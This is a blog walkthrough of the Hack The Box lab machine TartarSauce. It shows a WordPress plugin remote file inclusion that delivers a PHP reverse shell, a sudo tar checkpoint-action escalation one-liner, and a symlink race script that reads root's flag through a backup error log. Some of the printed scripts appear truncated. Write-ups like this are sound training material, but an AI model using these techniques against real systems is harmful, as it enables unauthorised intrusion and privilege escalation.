Hack The Box – TartarSauce Walkthrough

October 20, 2018


This week’s retiring machine is TartarSauce, which is full of rabbit holes deep enough to get stuck in.  With a rating of 6.2/10, it’s not the most difficult of machines out there, but it definitely felt a little more complex to me than a 30 point box.  Either way, we get to experience another web exploit this week via a remote file inclusion (RFI), some tar wildcard user escalation, and finally abusing a systemd timer to gain our root flag.  Let’s go ahead and get started!

Nmap Scan:

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-06 16:34 EDT
Nmap scan report for
Host is up (0.043s latency).
Not shown: 65534 closed ports

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

Network Distance: 2 hops

TRACEROUTE (using port 554/tcp)
1   44.69 ms
2   44.90 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.81 seconds

Looking at the initial scan, it appears we’re going to be dealing with a web application exploit and/or remote code execution to get a shell on the box (unless there is some sort of port-knocking or hidden UDP service).  It looks like we have quite a few sites in the robots.txt file, but I always like to venture out to the main website to see what we’re working with:


A big ol’ bottle of Tartar sauce is what we’re working with.  Viewing the source produces nothing.  My next thought process was to view each of the links in the robots.txt file.  All rabbit holes!  I wasted quite a bit of time looking at the pages that actually resolved as well as running dirb on a lot of the directories with all paths leading to nowhere.

Clearly, this box had tricks up its sleeve, but all was not lost.  Looking at the robots.txt, I noticed a common directory: webservices.  I decided to run a scan against this directory to see if I could find any hidden sub-directories that could lead me down the true path to shell.  The command I ran was: dirb

This time around, I got the results that I was looking for:


A WordPress directory!  If you are new to hacking, WordPress is full of fun exploits that lead to RCE.  There’s a great tool called wpscan that will check for these exploits and report back on them.  The command that eventually worked for me was enumerating vulnerable plugins.  That command was: wpscan –url –enumerate p

In the results of this scan was the Gwolle Guestbook plugin, which allows for RFI:


The exploit can be read about here: https://www.exploit-db.com/exploits/38861/

Essentially, we can host a malicious file and have the server reach out and execute it.  Since the server is running on Apache, we will need a PHP reverse shell file.  My favorite PHP reverse shell is courtesy of Pentest Monkey and can be found here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

What’s great about the shell is we only need to change two lines, our IP and port, to make it work:


It is important to save the file as “wp-load.php” as that is what the exploit calls for.  I decided to host the file using Python with the command, python -m SimpleHTTPServer 80 which hosts a HTTP server in the present working directory you run it in.


With the HTTP server running, we also need to set up netcat to listen on the port we specified in our PHP shell.  In this instance, I used port 4444.  We can have netcat listen on this port by typing nc -nvlp 4444


With our netcat listening and our malicious PHP file ready, it is time to execute the RFI call.  According to the exploit, we should be executing it as such in our browser:

With this syntax, it should pull down the malicious file:


As well as provide a reverse shell:


Checking the user with whoami, I discover the shell is running as the user www-data, which is common during web exploitation.  We do not have the user flag at this point, so we must escalate to a different user.  A quick sudo -l to see our sudo privileges yields the following results:


It appears that we can run tar as the user onuma with sudo privileges.  Given the box is named TartarSauce, I have a hunch this is important to us.  A very quick Google search of “tar privilege escalation” yields a site that I believe to be the answer: http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/

Essentially, we can create an empty file (I’ll create a file named shell.sh in the /tmp folder) and run the following command:

sudo -u onuma /bin/tar cf /dev/null shell.sh –checkpoint=1 –checkpoint-action=exec=/bin/sh

This command will run sudo as the user onuma along with the privilege escalation technique provided by the article above.  Let’s give it a try:


Awesome, it worked!  We now have our user flag and can begin privilege escalation.

In terms of privesc, I’ve heard rumblings of different ways to do it.  I’ve said in previous articles that when it comes to CTF, I am lazy and will do whatever is the easiest to capture the flag.  Sometimes, that means we do not even have to have a root shell to do so.  Let’s walk through that process.

While sitting on the Onuma shell, I tried pretty much all enumeration I could think of.  I investigated the shadow_bkp file you see above.  I ran all of my favorite enumeration scripts.  I dug pretty deep.  Eventually, I found something lurking in the shadows that is often not discussed: a systemd timer.

You can think of a systemd timer as basically a cron job.  It performs a task for the system on a timed basis.  In most enumeration scripts, a scan for this is left off.  We can run a command manually to see what timers are running on the system by typing systemctl list-timers


So, it appears that there is a service called “backuperer” running every five minutes.  This seems incredibly odd.  Let’s do a locate on backuperer and see what we can find:


Now, to cat the /usr/sbin/backuperer file:


# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P

# Set Vars Here
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)

# formatting
for n in $(seq 72);
do /usr/bin/printf $"-";

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
/usr/bin/diff -r $basedir $check$basedir

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
# Report errors so the dev can investigate the issue.
/usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
integrity_chk >> $errormsg
exit 2
# Clean up and save archive to the bkpdir.
/bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
/bin/rm -rf $check .*
exit 0

It really took me some time to read through this and understand completely what is going on.  Essentially, every five minutes a backup is created of the /var/www/html folder.  At some point, there is an integrity check that is done which compares the difference in files backed up and reports any errors into an “onuma_backup_error.txt” file.  This entire process is running as root.  Here’s an example of what the error text file looks like:

Integrity Check Error in backup last ran : Fri Mar 9 15:40:10 EST 2018
Only in /var/www/html: index.html
Only in /var/www/html/webservices/monstra-3.0.4: admin
Only in /var/www/html/webservices/monstra-3.0.4: backups
Only in /var/www/html/webservices/monstra-3.0.4: boot
Only in /var/www/html/webservices/monstra-3.0.4: CHANGELOG.md
Only in /var/www/html/webservices/monstra-3.0.4: engine
Only in /var/www/html/webservices/monstra-3.0.4: favicon.ico
Only in /var/www/html/webservices/monstra-3.0.4: .gitignore
Only in /var/www/html/webservices/monstra-3.0.4: .htaccess
Only in /var/www/html/webservices/monstra-3.0.4: index_copy.php
Only in /var/www/html/webservices/monstra-3.0.4: index.php
Only in /var/www/html/webservices/monstra-3.0.4: libraries
Only in /var/www/html/webservices/monstra-3.0.4: LICENSE.md
Only in /var/www/html/webservices/monstra-3.0.4/plugins: blog
Only in /var/www/html/webservices/monstra-3.0.4/plugins: captcha
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: addon
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: AUTHORS
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: bower.json
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: .gitattributes
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: .gitignore
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: .htaccess
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: index.html
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: keymap
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: lib
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror: LICENSE
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: apl
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: clike
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: cobol
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: coffeescript
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: commonlisp
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: css
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: d
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: eiffel
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: erlang
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: gas
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: groovy
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: htmlembedded
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: http
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: index.html
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: javascript
Only in /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode: julia
diff -r /var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode/less/index.html /var/tmp/check/var/www/html/webservices/monstra-3.0.4/plugins/codemirror/codemirror/mode/less/index.html
< text-decoration: none;

If you follow closely, it produces the files it is checking against and prints any differences that it finds between a file with the same name (as seen in the last few lines of the file).

So, what can we do with this information?  Well, it sounds like we need to create a file that is read and then change the file so that it is produced in the error output.  Because I’m lazy, the file I’m immediately interested in is the root.txt flag, which is typically stored in /root.  We need to somehow write the file in the /var/www/html directory, which means we will need to pop a shell again with www-data.

We can actually write the file using a symbolic link.  You can think of a symbolic link as the same thing as a shortcut in Windows.  We can basically store the information of root.txt into a file in the /var/www/html directory and then change the file to nothing when the backuperer timer executes.  This will create a difference of information that was already there (root.txt symbolic link) vs the empty file.

The timing of this was incredibly difficult.  While it is possible to achieve manually, it is much easier if we script it.  Shout out to my buddy Malvi for writing this:

cat >att.sh <<'EOF'
ln -s /root/root.txt /var/www/html/.heath
while [ "$stop" = "false" ]; do
       for i in `ls -a /var/tmp/ | grep -E '.[0-9a-f]{40}'`; do
              echo $i
              for i in {1..10}; do /bin/sleep 1; printf '.'; done
              rm -f /var/www/html/.heath; touch /var/www/html/.heath
       /bin/sleep 5; printf '+'

for i in {1..20}; do /bin/sleep 1; printf '.'; done
cat /var/backups/onuma_backup_error.txt

Looking at the script may provide a better idea of what’s going on.  We create a symbolic link to the root.txt file in the /var/www/html folder to a file named “.heath”.  We then run a while loop, which waits until a backup folder has been created in /var/tmp (the backup folder is a randomly generated name, so we grep based on this).  Once the folder is found, it removes the symbolic linked file and adds a new empty file with the touch command.  It waits a bit and then cats out the error file to see results.

We don’t necessarily have to create a new file here.  We just as well could write over the index.html file and achieve the same results.  I have been asked not to display flags, so here is what the result would look like with the flag removed:



This box provided a roller coaster of emotions for me.  I do believe the point value should have been at 40 points instead of 30.  There were a lot of rabbit holes and not blatantly obvious exploits.  When WordPress was found, there were still many vulnerabilities to look into.  Discovering the timed service wasn’t particularly easy, nor was timing out the symbolic links the obtain the flag.

With that being said, I enjoyed this box.  I find that not all machines are realistic on HTB, but you do learn a lesson from each of them.  While I’ll likely never find a WordPress Guestbook exploit in a penetration test, using tar to escalate privileges seems incredibly useful.  I will tuck that trick away in my hacking notes for sure!

Wanna chat? Add me on Twitter, YouTube or LinkedIn!
Veteran? Join our Slack!